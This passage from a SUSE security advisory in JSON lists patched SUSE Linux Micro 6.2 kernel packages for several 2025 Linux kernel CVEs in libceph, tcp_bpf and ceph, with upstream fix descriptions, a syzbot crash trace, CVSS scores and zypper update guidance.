"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-39829"
},
{
"cve": "CVE-2025-39880",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39880"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix invalid accesses to ceph_connection_v1_info\n\nThere is a place where generic code in messenger.c is reading and\nanother place where it is writing to con-\u003ev1 union member without\nchecking that the union member is active (i.e. msgr1 is in use).\n\nOn 64-bit systems, con-\u003ev1.auth_retry overlaps with con-\u003ev2.out_iter,\nso such a read is almost guaranteed to return a bogus value instead of\n0 when msgr2 is in use. This ends up being fairly benign because the\nside effect is just the invalidation of the authorizer and successive\nfetching of new tickets.\n\ncon-\u003ev1.connect_seq overlaps with con-\u003ev2.conn_bufs and the fact that\nit\u0027s being written to can cause more serious consequences, but luckily\nit\u0027s not something that happens often.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39880",
"url": "https://www.suse.com/security/cve/CVE-2025-39880"
},
{
"category": "external",
"summary": "SUSE Bug 1250388 for CVE-2025-39880",
"url": "https://bugzilla.suse.com/1250388"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-39880"
},
{
"cve": "CVE-2025-39913",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39913"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp_bpf: Call sk_msg_free() when tcp_bpf_send_verdict() fails to allocate psock-\u003ecork.\n\nsyzbot reported the splat below. [0]\n\nThe repro does the following:\n\n 1. Load a sk_msg prog that calls bpf_msg_cork_bytes(msg, cork_bytes)\n 2. Attach the prog to a SOCKMAP\n 3. Add a socket to the SOCKMAP\n 4. Activate fault injection\n 5. Send data less than cork_bytes\n\nAt 5., the data is carried over to the next sendmsg() as it is\nsmaller than the cork_bytes specified by bpf_msg_cork_bytes().\n\nThen, tcp_bpf_send_verdict() tries to allocate psock-\u003ecork to hold\nthe data, but this fails silently due to fault injection + __GFP_NOWARN.\n\nIf the allocation fails, we need to revert the sk-\u003esk_forward_alloc\nchange done by sk_msg_alloc().\n\nLet\u0027s call sk_msg_free() when tcp_bpf_send_verdict fails to allocate\npsock-\u003ecork.\n\nThe \"*copied\" also needs to be updated such that a proper error can\nbe returned to the caller, sendmsg. It fails to allocate psock-\u003ecork.\nNothing has been corked so far, so this patch simply sets \"*copied\"\nto 0.\n\n[0]:\nWARNING: net/ipv4/af_inet.c:156 at inet_sock_destruct+0x623/0x730 net/ipv4/af_inet.c:156, CPU#1: syz-executor/5983\nModules linked in:\nCPU: 1 UID: 0 PID: 5983 Comm: syz-executor Not tainted syzkaller #0 PREEMPT(full)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/12/2025\nRIP: 0010:inet_sock_destruct+0x623/0x730 net/ipv4/af_inet.c:156\nCode: 0f 0b 90 e9 62 fe ff ff e8 7a db b5 f7 90 0f 0b 90 e9 95 fe ff ff e8 6c db b5 f7 90 0f 0b 90 e9 bb fe ff ff e8 5e db b5 f7 90 \u003c0f\u003e 0b 90 e9 e1 fe ff ff 89 f9 80 e1 07 80 c1 03 38 c1 0f 8c 9f fc\nRSP: 0018:ffffc90000a08b48 EFLAGS: 00010246\nRAX: ffffffff8a09d0b2 RBX: dffffc0000000000 RCX: ffff888024a23c80\nRDX: 0000000000000100 RSI: 0000000000000fff RDI: 0000000000000000\nRBP: 0000000000000fff R08: ffff88807e07c627 R09: 1ffff1100fc0f8c4\nR10: dffffc0000000000 R11: ffffed100fc0f8c5 R12: ffff88807e07c380\nR13: dffffc0000000000 R14: ffff88807e07c60c R15: 1ffff1100fc0f872\nFS: 00005555604c4500(0000) GS:ffff888125af1000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00005555604df5c8 CR3: 0000000032b06000 CR4: 00000000003526f0\nCall Trace:\n \u003cIRQ\u003e\n __sk_destruct+0x86/0x660 net/core/sock.c:2339\n rcu_do_batch kernel/rcu/tree.c:2605 [inline]\n rcu_core+0xca8/0x1770 kernel/rcu/tree.c:2861\n handle_softirqs+0x286/0x870 kernel/softirq.c:579\n __do_softirq kernel/softirq.c:613 [inline]\n invoke_softirq kernel/softirq.c:453 [inline]\n __irq_exit_rcu+0xca/0x1f0 kernel/softirq.c:680\n irq_exit_rcu+0x9/0x30 kernel/softirq.c:696\n instr_sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1052 [inline]\n sysvec_apic_timer_interrupt+0xa6/0xc0 arch/x86/kernel/apic/apic.c:1052\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39913",
"url": "https://www.suse.com/security/cve/CVE-2025-39913"
},
{
"category": "external",
"summary": "SUSE Bug 1250705 for CVE-2025-39913",
"url": "https://bugzilla.suse.com/1250705"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-39913"
},
{
"cve": "CVE-2025-39927",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39927"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nceph: fix race condition validating r_parent before applying state\n\nAdd validation to ensure the cached parent directory inode matches the\ndirectory info in MDS replies. This prevents client-side race conditions\nwhere concurrent operations (e.g. rename) cause r_parent to become stale\nbetween request initiation and reply processing, which could lead to\napplying state changes to incorrect directory inodes.\n\n[ idryomov: folded a kerneldoc fixup and a follow-up fix from Alex to\n move CEPH_CAP_PIN reference when r_parent is updated:\n\n When the parent directory lock is not held, req-\u003er_parent can become\n stale and is updated to point to the correct inode. However, the\n associated CEPH_CAP_PIN reference was not being adjusted. The\n CEPH_CAP_PIN is a reference on an inode that is tracked for\n accounting purposes. Moving this pin is important to keep the\n accounting balanced. When the pin was not moved from the old parent\n to the new one, it created two problems: The reference on the old,\n stale parent was never released, causing a reference leak.\n A reference for the new parent was never acquired, creating the risk\n of a reference underflow later in ceph_mdsc_release_request(). This\n patch corrects the logic by releasing the pin from the old parent and\n acquiring it for the new parent when r_parent is switched. This\n ensures reference accounting stays balanced. ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39927",
"url": "https://www.suse.com/security/cve/CVE-2025-39927"
},
{
"category": "external",
"summary": "SUSE Bug 1250738 for CVE-2025-39927",
"url": "https://bugzilla.suse.com/1250738"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
